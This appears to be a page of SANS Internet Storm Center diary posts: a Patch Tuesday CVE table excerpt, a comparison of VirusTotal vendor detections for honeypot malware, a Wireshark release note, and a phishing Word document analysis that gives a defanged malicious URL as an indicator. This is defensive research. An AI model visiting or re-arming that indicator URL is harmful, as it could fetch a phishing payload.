%%cve:2022-38007%% No No Less Likely Less Likely Important 7.8 7.0
Chromium: CVE-2022-3038 Use after free in Network Service
%%cve:2022-3038%% No No - - -    
Chromium: CVE-2022-3039 Use after free in WebSQL
%%cve:2022-3039%% No No - - -    
Chromium: CVE-2022-3040 Use after free in Layout
%%cve:2022-3040%% No No - - -    
Chromium: CVE-2022-3041 Use after free in WebSQL
%%cve:2022-3041%% No No - - -    
Chromium: CVE-2022-3044 Inappropriate implementation in Site Isolation
%%cve:2022-3044%% No No - - -    
Chromium: CVE-2022-3045 Insufficient validation of untrusted input in V8
%%cve:2022-3045%% No No - - -    
Chromium: CVE-2022-3046 Use after free in Browser Tag
%%cve:2022-3046%% No No - - -    
Chromium: CVE-2022-3047 Insufficient policy enforcement in Extensions API
%%cve:2022-3047%% No No - - -    
Chromium: CVE-2022-3053 Inappropriate implementation in Pointer Lock
%%cve:2022-3053%% No No - - -    
Chromium: CVE-2022-3054 Insufficient policy enforcement in DevTools
%%cve:2022-3054%% No No - - -    
Chromium: CVE-2022-3055 Use after free in Passwords
%%cve:2022-3055%% No No - - -    
Chromium: CVE-2022-3056 Insufficient policy enforcement in Content Security Policy
%%cve:2022-3056%% No No - - -    
Chromium: CVE-2022-3057 Inappropriate implementation in iframe Sandbox
%%cve:2022-3057%% No No - - -    
Chromium: CVE-2022-3058 Use after free in Sign-In Flow
%%cve:2022-3058%% No No - - -    
Chromium: CVE-2022-3075 Insufficient data validation in Mojo
%%cve:2022-3075%% No No - - -    
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2022-37954%% No No More Likely More Likely Important 7.8 6.8
HTTP V3 Denial of Service Vulnerability
%%cve:2022-35838%% No No Less Likely Less Likely Important 7.5 6.5
Microsoft Defender for Endpoint for Mac Elevation of Privilege Vulnerability
%%cve:2022-35828%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft Dynamics CRM (on-premises) Remote Code Execution Vulnerability
%%cve:2022-35805%% No No Less Likely Less Likely Critical 8.8 7.7
%%cve:2022-34700%% No No Less Likely Less Likely Critical 8.8 7.7
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
%%cve:2022-38012%% No No Less Likely Less Likely Low 7.7 6.7
Microsoft ODBC Driver Remote Code Execution Vulnerability
%%cve:2022-34726%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-34727%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-34730%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-34732%% No No Unlikely Unlikely Important 8.8 7.7
%%cve:2022-34734%% No No Less Likely Less Likely Important 8.8 7.7
Microsoft OLE DB Provider for SQL Server Remote Code Execution Vulnerability
%%cve:2022-35834%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-35835%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-35836%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-35840%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-34731%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-34733%% No No Less Likely Less Likely Important 8.8 7.7
Microsoft Office Visio Remote Code Execution Vulnerability
%%cve:2022-38010%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2022-37963%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft PowerPoint Remote Code Execution Vulnerability
%%cve:2022-37962%% No No Less Likely Less Likely Important 7.8 6.8
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2022-35823%% No No Unlikely Unlikely Important 8.1 7.1
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2022-38008%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-38009%% No No Less Likely Less Likely Important 8.8 7.7
%%cve:2022-37961%% No No Unlikely Unlikely Important 8.8 7.7
Network Device Enrollment Service (NDES) Security Feature Bypass Vulnerability
%%cve:2022-37959%% No No Less Likely Less Likely Important 6.5 5.7
Raw Image Extension Remote Code Execution Vulnerability
%%cve:2022-38011%% No No Less Likely Less Likely Important 7.3 6.4
Remote Procedure Call Runtime Remote Code Execution Vulnerability
%%cve:2022-35830%% No No Less Likely Less Likely Important 8.1 7.1
SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Information Disclosure Vulnerability
%%cve:2022-37958%% No No Less Likely Less Likely Important 7.5 6.5
Visual Studio Code Elevation of Privilege Vulnerability
%%cve:2022-38020%% No No Less Likely Less Likely Important 7.3 6.4
Windows ALPC Elevation of Privilege Vulnerability
%%cve:2022-34725%% No No More Likely More Likely Important 7.0 6.1
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2022-35803%% No No More Likely More Likely Important 7.8 6.8
%%cve:2022-37969%% Yes Yes Detected Detected Important 7.8 6.8
Windows Credential Roaming Service Elevation of Privilege Vulnerability
%%cve:2022-30170%% No No Less Likely Less Likely Important 7.3 6.4
Windows DNS Server Denial of Service Vulnerability
%%cve:2022-34724%% No No Less Likely Less Likely Important 7.5 6.5
Windows DPAPI (Data Protection Application Programming Interface) Information Disclosure Vulnerability
%%cve:2022-34723%% No No Less Likely Less Likely Important 5.5 4.8
Windows Distributed File System (DFS) Elevation of Privilege Vulnerability
%%cve:2022-34719%% No No Less Likely Less Likely Important 7.8 6.8
Windows Enterprise App Management Service Remote Code Execution Vulnerability
%%cve:2022-35841%% No No Less Likely Less Likely Important 8.8 7.7
Windows Event Tracing Denial of Service Vulnerability
%%cve:2022-35832%% No No Less Likely Less Likely Important 5.5 4.8
Windows Fax Service Remote Code Execution Vulnerability
%%cve:2022-38004%% No No Less Likely Less Likely Important 7.8 6.8
Windows GDI Elevation of Privilege Vulnerability
%%cve:2022-34729%% No No More Likely More Likely Important 7.8 7.0
Windows Graphics Component Information Disclosure Vulnerability
%%cve:2022-35837%% No No Less Likely Less Likely Important 5.0 4.4
%%cve:2022-34728%% No No Less Likely Less Likely Important 5.5 4.8
%%cve:2022-38006%% No No Less Likely Less Likely Important 6.5 5.7
Windows Group Policy Elevation of Privilege Vulnerability
%%cve:2022-37955%% No No Less Likely Less Likely Important 7.8 6.8
Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability
%%cve:2022-34720%% No No Less Likely Less Likely Important 7.5 6.5
Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
%%cve:2022-34721%% No No Less Likely Less Likely Critical 9.8 8.5
%%cve:2022-34722%% No No Less Likely Less Likely Critical 9.8 8.5
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2022-33679%% No No Less Likely Less Likely Important 8.1 7.3
%%cve:2022-33647%% No No Less Likely Less Likely Important 8.1 7.1
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2022-37964%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2022-37956%% No No Less Likely Less Likely Important 7.8 6.8
%%cve:2022-37957%% No No More Likely More Likely Important 7.8 6.8
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
%%cve:2022-30200%% No No Less Likely Less Likely Important 7.8 6.8
Windows Photo Import API Elevation of Privilege Vulnerability
%%cve:2022-26928%% No No Less Likely Less Likely Important 7.0 6.1
Windows Print Spooler Elevation of Privilege Vulnerability
%%cve:2022-38005%% No No Unlikely Unlikely Important 7.8 6.8
Windows Remote Access Connection Manager Information Disclosure Vulnerability
%%cve:2022-35831%% No No Less Likely Less Likely Important 5.5 4.8
Windows Secure Channel Denial of Service Vulnerability
%%cve:2022-30196%% No No Less Likely Less Likely Important 8.2 7.1
%%cve:2022-35833%% No No Less Likely Less Likely Important 7.5 6.5
Windows TCP/IP Remote Code Execution Vulnerability
%%cve:2022-34718%% No No More Likely More Likely Critical 9.8 8.5

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

0 Comments

Published: 2022-09-12

VirusTotal Result Comparisons for Honeypot Malware

[This post was submitted by Jesse La Grew]

VirusTotal has become an important tool for researchers and defenders alike. Unusual executables or files can be uploaded to get an idea of how different antivirus vendors will classify it. Keeping the discovery of customized malware secret is also important and, in those cases, file hashes can be used to find any preexisting results. It should always be assumed that any file submitted to VirusTotal is being looked at by someone. The malware seen by public honeypots, such as the DShield honeypot, generally are not considered sensitive. Malware seen by these devices is being broadly used around the world in an attempt to compromise IoT (Internet of Things) devices. 
Examples below are from a honeypot that is configured to submit samples to VirusTotal when a new file is downloaded from or uploaded to the honeypot [3]. This helps to summarize attacks and attempt to classify the type of malware being used. A common finding is that there are very different naming conventions and results from vendor to vendor.
virustotal results
Figure 1: VirusTotal results for a file created on honeypot

Vendors With No Results

A surprising item was just how many vendors never gave any results for files seen on this honeypot. 

Acronis

Alibaba

APEX

BitDefenderFalx

Bkav

CMC

CrowdStrike

Cybereason

Cylance

eGambit

Endgame

F-Prot

Invincea

Kingsoft

Malwarebytes

Paloalto

Qihoo-360

SUPERAntiSpyware

SymantecMobileInsight

TACHYON

tehtris

TotalDefense

trapmine

Trustlook

VBA32

Webroot

Zoner

A possibility is that many of these vendors are not supplying data at this time or may not have been used in VirusTotal results in the past. These vendor lists do change over time:
•    73 Providers from date range 6/7/2022 – 7/31/2022
•    82 Providers from date range 6/7/2022 – 9/3/2022
That means in the last month, there has been an increase of 9 vendors, although this doesn’t consider any vendors that may have also been removed at this time.

Suggested Threat Results

VirusTotal will also give general threat classifications that can help to give a good high-level picture. 

VT Threat Classification

Count of  VT Threat Classification

Percentage

trojan.shell/malkey

5579

52.43%

trojan.shell/linux

3816

35.86%

downloader.bash/miraia

299

2.81%

downloader.shell

277

2.60%

trojan.linux/mirai

119

1.12%

downloader.

118

1.11%

trojan.mirai/linux

92

0.86%

downloader.bash/linux

54

0.51%

trojan.linux/shell

53

0.50%

downloader.miraia/bash

31

0.29%

Out of over 10,000 different honeypot results, files associated with malicious SSH authorized_keys were the most prevalent. Another item high on the list is Mirai, which is a popular botnet [4]. Many Mirai variants are seen on a regular basis by honeypots. Results Change Over Time We have already seen that results can be different between vendors; those vendors change and even VirusTotal threat classifications can sometimes seem inconsistent. Malware changes and new variants appear. Knowledge about this malware also changes, and this also changes the information received from a variety of tools. Looking at one example, it was seen that within a 6-hour period, the number of vendors seeing a particular hash as malware increased by 13, and the threat classification from VirusTotal also change from “trojan.mirai/linux” to “trojan.linux/mirai”.

Normalizing the stored hashes with the latest stored VirusTotal threat classification gives a different picture than seen before.

Mirai is still a significant contender for popularity but the use of creating an authorized_keys file is by far the most common. A little help came from Excel and the XLOOKUP function to gather the latest locally stored results for a particular hash [5].

Different Provider Comparisons

So far, this has only focused on suggested classifications from VirusTotal. The naming of these threats from the various vendors also differs quite a bit and we see a much different number of results.

Provider

Number of Results

No Classification

Provider Data Not Available

Total

Avast

1273

519

0

1792

AVG

1273

34

485

1792

GData

1201

591

0

1792

DrWeb

1151

641

0

1792

MicroWorld-eScan

1132

660

0

1792

Ad-Aware

1130

662

0

1792

BitDefender

1128

664

0

1792

FireEye

1117

675

0

1792

Emsisoft

1079

695

18

1792

ALYac

1030

762

0

1792

Ikarus

1021

771

0

1792

AhnLab-V3

971

821

0

1792

TrendMicro

942

850

0

1792

TrendMicro-HouseCall

941

851

0

1792

CAT-QuickHeal

915

877

0

1792

Kaspersky

796

996

0

1792

Comodo

775

1017

0

1792

Arcabit

756

1036

0

1792

Lionic

714

1078

0

1792

Avira

701

1091

0

1792

VIPRE

692

262

838

1792

Cynet

686

1077

29

1792

ESET-NOD32

628

1164

0

1792

MAX

622

1170

0

1792

Tencent

562

1230

0

1792

Microsoft

533

1257

2

1792

Fortinet

524

1239

29

1792

Cyren

523

1269

0

1792

Rising

517

1275

0

1792

McAfee-GW-Edition

501

1290

1

1792

Sophos

496

1284

12

1792

McAfee

486

1305

1

1792

Sangfor

458

1158

176

1792

Symantec

422

1039

331

1792

NANO-Antivirus

405

1387

0

1792

ZoneAlarm

305

1478

9

1792

Google

188

60

1544

1792

F-Secure

155

1637

0

1792

Antiy-AVL

121

890

781

1792

ClamAV

107

1671

14

1792

SentinelOne

94

1698

0

1792

Elastic

74

1707

11

1792

MaxSecure

72

1710

10

1792

Jiangmin

71

1721

0

1792

Avast-Mobile

70

1722

0

1792

BitDefenderTheta

59

1729

4

1792

Zillya

56

1736

0

1792

VirIT

51

1726

15

1792

ViRobot

48

1744

0

1792

Gridinsoft

23

1758

11

1792

Yandex

22

1770

0

1792

Baidu

7

1785

0

1792

Panda

5

1780

7

1792

K7AntiVirus

2

1790

0

1792

K7GW

2

1790

0

1792

CMC

0

995

797

1792

TACHYON

0

1792

0

1792

Malwarebytes

0

1774

18

1792

Trustlook

0

1792

0

1792

Zoner

0

1792

0

1792

BitDefenderFalx

0

1781

11

1792

TotalDefense

0

11

1781

1792

eGambit

0

14

1778

1792

Kingsoft

0

1783

9

1792

Acronis

0

1792

0

1792

Invincea

0

11

1781

1792

CrowdStrike

0

1792

0

1792

F-Prot

0

11

1781

1792

VBA32

0

1792

0

1792

APEX

0

1792

0

1792

tehtris

0

1777

15

1792

SUPERAntiSpyware

0

1792

0

1792

Webroot

0

1792

0

1792

SymantecMobileInsight

0

1792

0

1792

Qihoo-360

0

11

1781

1792

Cybereason

0

1671

121

1792

Endgame

0

11

1781

1792

Alibaba

0

1792

0

1792

Bkav

0

1792

0

1792

Trapmine

0

1746

46

1792

Paloalto

0

1792

0

1792

Cylance

0

1787

5

1792

This also highlights towards the end of this list vendors that did not have any results. Looking at some of the most popular providers, we also see a difference with naming of threats.

Avast Result

 Count

VirusTotal  Suggested Threats

Other:Malware-gen [Trj]

517

trojan.shell/linux', 'trojan.shell/malkey', 'trojan.linux/bruteforce', 'trojan.linux/shell', 'trojan.linux/bash', 'trojan.linux/sshbru', 'trojan.linux'

BV:Downloader-AAN [Drp]

185

downloader.linux', 'trojan.linux/shell', 'downloader.bash/linux', 'downloader.bash/miraia', 'downloader.linux/bash', 'downloader.linux/shell'

BV:Downloader-AEH [Drp]

146

'downloader.miraia/bash', 'trojan.linux/mirai', 'downloader.linux', 'downloader.gen2', 'downloader.bash/linux', 'downloader.', 'downloader.shell', 'downloader.bash/miraia'

BV:Agent-BAP [Trj]

97

'trojan.shell/linux', 'trojan.linux/shell', 'trojan.ircbot/shell', 'trojan.ircbot/linux', 'trojan.linux/ircbot', 'trojan.shell/ircbot'

BV:Downloader-II [Trj]

93

'trojan.shell/vsntcg22', 'downloader.', 'downloader.jvhi/shell', 'downloader.shell', 'downloader.shell/linux'

BV:Downloader-OJ [Drp]

78

'trojan.shell', 'downloader.shell', 'trojan.shell/gen2'

ELF:Mirai-BOD [Trj]

25

'trojan.mirai/linux', 'trojan.linux/mirai'

ELF:Xorddos-AB [Trj]

23

'trojan.linux/xorddos'

BV:Downloader-APV [Drp]

19

'downloader.bash/miraib', 'downloader.miraib/bash'

ELF:Miner-KC [Trj]

19

'trojan.linux', 'trojan.linux/uselvhs22', 'trojan.linux/multiverze', 'trojan.linux/tygpz'

BV:Downloader-APK [Drp]

17

'downloader.bash/miraib', 'trojan.linux/shell', 'downloader.shell/bashdlod', 'downloader.miraib/bash'

ELF:BitCoinMiner-HF [Trj]

9

'miner.linux/camelot'

ELF:Mirai-ADP [Trj]

9

'trojan.mirai/linux', 'trojan.linux/mirai'

ELF:Mirai-AHC [Trj]

5

'trojan.linux/mirai'

Perl:IRCBot-AD [Trj]

4

'ircbot/perl'

Perl:IRCBot-D [Trj]

4

'trojan.perl/shellbot'

ELF:Mirai-ARL [Trj]

4

'trojan.linux/gafgyt'

ELF:Mirai-BWY [Trj]

4

'trojan.mirai/linux'

BV:Downloader-AMZ [Drp]

4

'trojan.shell/smlbr', 'trojan.smlbr/shell'

ELF:Mirai-AAJ [Trj]

3

'trojan.mirai/linux'

Perl:Shellbot-O [Trj]

2

'trojan.perl/shellbot'

ELF:Mirai-BXS [Trj]

2

'trojan.mirai/linux'

ELF:MiraiDownloader-MX [Trj]

1

'trojan.linux/mirai'

ELF:Goldfishgang-A [Bot]

1

'trojan.mirai/linux'

ELF:Mirai-APD [Trj]

1

'trojan.mirai/linux'

ELF:MiraiDownloader-MR [Drp]

1

'downloader.linux/mirai'

Avast and AVG have the same results and numbers, although this is likely due to Avast acquiring AVG in 2016 [6].

GData Result

 Count

 VirusTotal Suggested Threats

Trojan.Shell.Agent.V

452

'trojan.shell/linux', 'trojan.shell/malkey'

Trojan.Shell.Agent.U

100

'trojan.shell/linux', 'trojan.linux/shell', 'trojan.ircbot/shell', 'trojan.ircbot/linux', 'trojan.linux/ircbot', 'trojan.shell/ircbot'

Script.Trojan.Agent.Q2DN10

73

'downloader.', 'downloader.shell', 'downloader.shell/linux'

Trojan.GenericKD.39794855

56

'trojan.shell'

Trojan.GenericKD.50084125

32

'trojan.', 'trojan.linux/bruteforce', 'trojan.linux/shell', 'trojan.linux/sshbru', 'trojan.linux'

Linux.Trojan.Mirai.B

29

'trojan.mirai/linux', 'trojan.linux/mirai'

Linux.Application.CoinMiner.AH (2x)

20

'trojan.linux/shell', 'trojan.linux/bash'

Script.Trojan.Agent.SLJ1UA

20

'trojan.shell', 'trojan.shell/gen2'

Trojan.Linux.GenericKD.39722060

15

'trojan.linux/multiverze', 'trojan.linux/tygpz'

Trojan.Downloader.JVHI

13

'downloader.jvhi/shell'

Trojan.Linux.Generic.208033

12

'trojan.linux/xorddos'

Generic.Bash.MiraiA.30F5F415

11

'downloader.bash/miraia'

Trojan.Linux.GenericA.73252

11

'trojan.linux/xorddos'

Generic.Bash.MiraiB.CB1F6D93

10

'downloader.miraib/bash'

Script.Trojan.Agent.Z0E85G

10

'downloader.shell/bashdlod', 'trojan.linux/shell'

Generic.Bash.MiraiA.1042638E

9

'downloader.miraia/bash'

Trojan.Linux.Generic.261801

8

'trojan.linux/shell'

Generic.Bash.MiraiA.FC226613

8

'downloader.bash/linux'

Trojan.Linux.GenericKD.40003689

8

'trojan.linux', 'trojan.linux/uselvhs22'

Generic.Bash.MiraiA.37E69EBB

7

'downloader.bash/miraia'

Generic.Bash.MiraiA.9FE00F4A

7

'downloader.bash/miraia'

Generic.Bash.MiraiA.F71C9D36

7

'downloader.bash/miraia'

Generic.Bash.MiraiB.43209CEF

7

'downloader.miraib/bash'

Generic.Bash.MiraiA.C840B7CF

6

'downloader.bash/miraia', 'downloader.bash/linux'

Generic.Bash.MiraiA.B7AF6546

6

'downloader.bash/miraia'

Generic.Bash.MiraiA.76F02707

6

'downloader.bash/miraia'

Trojan.GenericKD.61105047

6

'trojan.linux/shell'

Trojan.Linux.Agent.IOS

5

'trojan.linux/mirai'

Backdoor.Perl.Shellbot.F

5

'trojan.perl/shellbot'

Generic.Bash.MiraiA.F31D7395

5

'downloader.bash/miraia'

Trojan.GenericKD.50646874

5

'trojan.'

Trojan.Linux.GenericKD.49342126

5

'trojan.linux/mirai'

Generic.Bash.MiraiA.53DA044C

5

'downloader.bash/miraia', 'downloader.bash/linux'

Generic.Bash.MiraiA.CDE0B287

5

'downloader.bash/linux'

Generic.Bash.MiraiA.5A5455F1

5

'downloader.bash/miraia'

Trojan.GenericKD.46067161

4

'trojan.linux'

Trojan.GenericKD.46077164

4

'trojan.linux/shell'

Trojan.GenericKD.48821331

4

'trojan.'

Trojan.GenericKD.39722073

4

'trojan.linux'

Application.Linux.Generic.9905

4

'trojan.linux/gafgyt'

Generic.Bash.MiraiA.2B19920F

4

'downloader.miraia/bash'

Generic.Bash.MiraiA.AB3356B6

4

'downloader.linux/bash'

Generic.Bash.MiraiA.90D485C3

4

'downloader.bash/miraia'

Generic.Bash.MiraiA.1BB22156

4

'downloader.bash/miraia', 'downloader.bash/linux'

Generic.Bash.MiraiA.77A820C1

4

'downloader.bash/miraia'

Generic.Bash.MiraiA.9F225672

4

'downloader.bash/miraia'

Generic.Bash.MiraiA.C00C7246

4

'downloader.bash/linux'

Generic.Bash.MiraiA.261F2800

4

'downloader.bash/miraia'

Generic.Bash.MiraiA.91B96D6D

4

'downloader.bash/miraia'

Generic.Bash.MiraiA.8525AE6B

4

'downloader.bash/miraia'

Generic.Bash.MiraiB.81B3B899

4

'trojan.miraib/bash'

Generic.Bash.MiraiA.42A992E0

4

'downloader.bash/miraia', 'downloader.linux/bash'

Linux.Trojan.Agent.FRYE0V

3

'trojan.mirai/linux'

Generic.Bash.MiraiB.EB588E65

3

'downloader.miraib/bash'

Generic.Bash.MiraiA.F4E0D44D

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.9FAC84B8

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.42844671

3

'downloader.bash/miraia'

Trojan.GenericKD.50084126

3

'trojan.linux/shell'

Linux.Trojan.Mirai.E

3

'trojan.mirai/linux'

Trojan.Linux.Mirai.GDC

3

'trojan.linux/mirai'

Generic.Bash.MiraiA.49306ADF

3

'downloader.linux/bash'

Generic.Bash.MiraiA.F9E49AE2

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.87330CC0

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.A6961F86

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.29E60E32

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.1DCA368B

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.32EA1F82

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.370A6145

3

'downloader.bash/linux'

Generic.Bash.MiraiA.88F9FED5

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.A6CEE47A

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.6215B474

3

'downloader.miraia/bash'

Generic.Bash.MiraiA.BF170979

3

'downloader.linux/bash', 'downloader.bash/linux'

Linux.Application.CoinMiner.AH

3

'trojan.linux/sshbru'

Generic.Bash.MiraiA.8991856A

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.D4BA1004

3

'downloader.bash/miraia'

Generic.Bash.MiraiA.EE96A6CC

3

'downloader.bash/miraia'

Generic.Bash.MiraiB.C122DEF0

2

'trojan.miraib/bash'

Linux.Trojan.Agent.21WIPQ

2

'trojan.linux/mirai'

Script.Trojan.Agent.D34HUR

2

'downloader.linux'

Backdoor.Perl.Shellbot.B

2

'trojan.perl/shellbot'

Generic.Bash.MiraiA.19B73922

2

'downloader.miraia/bash'

Generic.Bash.MiraiA.F9CC4608

2

'downloader.linux/bash', 'downloader.bash/linux'

Generic.Bash.MiraiA.E2FF41E4

2

'downloader.bash/miraia'

Generic.Bash.MiraiA.F384FF05

2

'downloader.bash/miraia'

Generic.Bash.MiraiA.03BF947A

2

'downloader.bash/miraia'

Generic.Bash.MiraiA.D2936D49

2

'downloader.bash/miraia'

Script.Trojan.Agent.XQDCBP

2

'downloader.linux/shell'

Trojan.Linux.GenericKD.49319781

2

'trojan.linux/mirai'

Generic.Bash.MiraiA.AFC860A3

2

'downloader.bash/miraia'

Linux.Trojan.Agent.71ZXJT

2

'trojan.linux/mirai'

Generic.Bash.MiraiA.0A4B5647

2

'downloader.bash/miraia'

Generic.Bash.MiraiA.3085EB19

2

'downloader.bash/linux'

Generic.Bash.MiraiA.C8C8B46F

2

'downloader.linux/bash'

Generic.Bash.MiraiA.E0206CAA

2

'downloader.miraia/bash'

Generic.Bash.MiraiA.AFD545E8

2

'downloader.bash/miraia'

Generic.Bash.MiraiA.9DFBA98D

2

'downloader.bash/linux'

Generic.Bash.MiraiA.77508253

2

'downloader.bash/miraia'

Trojan.Linux.Generic.266531

2

'trojan.linux/shell'

Generic.Bash.MiraiA.999DC364

2

'downloader.bash/miraia'

Generic.Bash.MiraiB.C388CEE8

1

'downloader.miraib/bash'

Trojan.Linux.Generic.258109

1

'trojan.linux/mirai'

Generic.Bash.MiraiB.9F77C950

1

'downloader.miraib/bash'

Gen:Variant.Trojan.Linux.Mirai.8

1

'trojan.mirai/linux'

Trojan.GenericKD.48821326

1

'trojan.linux'

Trojan.Linux.Generic.207109

1

'trojan.linux/shell'

Generic.Bash.MiraiA.F7E66D30

1

'downloader.bash/miraia'

Linux.Trojan.Agent.0JQTA6

1

'trojan.linux/mirai'

Generic.Bash.MiraiA.6AB1054A

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.E4FF83F6

1

'downloader.bash/miraia'

Linux.Trojan.Mirai.J

1

'trojan.mirai/linux'

Generic.Bash.MiraiA.06015B18

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.716695BA

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.CA694A08

1

'downloader.bash/linux'

Generic.Bash.MiraiA.7D12497D

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.24330190

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.7AD1CA92

1

'downloader.bash/linux'

Generic.Bash.MiraiA.9A967DD3

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.A3F75002

1

'downloader.linux/bash'

Generic.Bash.MiraiB.83D16FFF

1

'downloader.bash/miraib'

Generic.Bash.MiraiA.7176EFCA

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.BBDDAFB3

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.9C2BFED6

1

'downloader.bash/miraia'

Generic.Bash.MiraiA.27A5FB7E

1

'downloader.bash/miraia'

Generic.Bash.MiraiB.A8550CC8

1

'downloader.bash/miraib'

Script.Trojan.Agent.SSSDZG

1

trojan.shell/smlbr'

 

Microsoft Result

 Count

 VirusTotal Suggested Threats

TrojanDownloader:Linux/Morila!MTB

118

'trojan.linux/shell', 'downloader.bash/linux', 'downloader.bash/miraia', 'downloader.linux/bash', 'downloader.linux/shell'

Backdoor:Linux/IRCbot.YA!MTB

95

'trojan.shell/linux', 'trojan.linux/shell', 'trojan.ircbot/shell', 'trojan.ircbot/linux', 'trojan.linux/ircbot', 'trojan.shell/ircbot'

Trojan:Linux/Multiverze

58

'trojan.linux/uselvhs22', 'trojan.linux/mirai', 'trojan.linux/tygpz', 'trojan.mirai/linux', 'trojan.linux/multiverze'

TrojanDownloader:Linux/Morila.B!MTB

57

'downloader.bash/miraia', 'downloader.bash/linux'

TrojanDownloader:Linux/ShWg.YB!MTB

54

'downloader.bash/miraia', 'trojan.linux/shell', 'downloader.bash/linux'

Trojan:Script/Wacatac.B!ml

40

'downloader.bash/miraib', 'trojan.miraib/bash', 'trojan.mirai/linux', 'downloader.miraib/bash'

HackTool:Linux/Sshbru!MTB

26

'trojan.linux/shell', 'trojan.linux', 'trojan.linux/sshbru'

DoS:Linux/Xorddos.A

23

'trojan.linux/xorddos'

Trojan:Linux/CoinMiner!rfn

16

'trojan.linux/shell'

Trojan:Linux/CoinMiner.N!MTB

9

'miner.linux/camelot'

HackTool:Linux/Sshbru!rfn

8

'trojan.linux/shell', 'trojan.linux/sshbru', 'trojan.linux/bruteforce'

Backdoor:Linux/Mirai.BO!MTB

6

'trojan.linux/mirai', 'linux'

Trojan:Win32/Occamy.CAD

4

'trojan.linux'

Backdoor:HTML/Derflop.A

4

'trojan.perl/shellbot'

Backdoor:Linux/Gafgyt.A!MTB

4

'trojan.linux/gafgyt'

Trojan:Unix/Multiverze

3

'trojan.linux/shell'

Trojan:Linux/Mirai.AB!MTB

2

'downloader.bash/miraia'

Trojan:Linux/Downldr.AE!MTB

2

'downloader.bash/miraia'

Backdoor:Linux/Mirai.AN!xp

1

'trojan.mirai/linux'

Trojan:Linux/ZkarletFlash

1

'trojan.mirai/linux'

Backdoor:Linux/Mirai.AW!MTB

1

'trojan.mirai/linux'

TrojanDownloader:Linux/Mirai.C!MTB

1

'downloader.linux/mirai'

 

Summarized and detailed hash data can be downloaded from here [7]. 

When using tools like VirusTotal it is important to be aware of name changes over time and that vendors have their own naming schemes. Make sure that you’re using the latest available results and using the “Reanalyse File” option within VirusTotal to update analysis information. 

[1] https://www.virustotal.com
[2] https://isc.sans.edu/honeypot.html
[3] https://github.com/jslagrew/cowrieprocessor/blob/main/submit_vtfiles.py
[4] https://en.wikipedia.org/wiki/Mirai_(malware)
[5] https://exceljet.net/formula/xlookup-latest-by-date
[6] https://www.comparitech.com/antivirus/avast-vs-avg/
[7] https://www.dropbox.com/sh/jswjv5mlvku0ep7/AADm5vyoR8Jwil7_BgqXjz7ra?dl=0

 

1 Comments

Published: 2022-09-11

Wireshark 3.6.8 and 4.0.0rc1 Released

Wireshark version 3.6.8 was released. It fixes 1 vulnerability and 15 bugs.

The vulnerability is an infinite loop in the F5 Ethernet Trailer dissector.

And the first release candidate for Wireshark 4.0.0 was also released.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-10

Phishing Word Documents with Suspicious URL

Got this word document this week that was quarantined as phishing by Defender (223341099.docx) with the Subject: Urgent Payment Issue. Using Didier malware analysis tools, I ran through the following checks to see what could be embedded in it that is likely suspicious. I first checked the file using oledump.py to see if there were any OLE files in this document. 



Next step was to check what is inside this OPC file using zipdump.py. 


 

There is one jpeg file in there and the remainder are all XML all dated September 1, 2022. Since everything appear to be a word/document.xml, lets look for URL that might be hidden in this word document by digging inside with zipdump.py using the following options described by Didier here

 

One interesting URL has been located in the document. The option re-earch searches inside the text with -e which extracted the string. My last step is to dump content of item #4 to see all the other URLs including the one previous identified:

 


Indicator

qaz[.]im
https://qaz[.]im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6

 

[1] https://github.com/DidierStevens/DidierStevensSuite
[2] https://isc.sans.edu/diary/Analyzing+a+Phishing+Word+Document/28562
[3] https://www.virustotal.com/gui/url/bdebda9813ab5d38ec1e2b691aa40e2886f3c38e726780560b59af6007906ad6?nocache=1

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 Comments

Published: 2022-09-09

Maldoc With Decoy BASE64

There is also a video for this analysis: "Maldoc Analysis: Rehearsed vs. Unrehearsed".

I analysed this maldoc. It contains an old exploit for the equation editor. Nothing special. And it's easy to analyze.

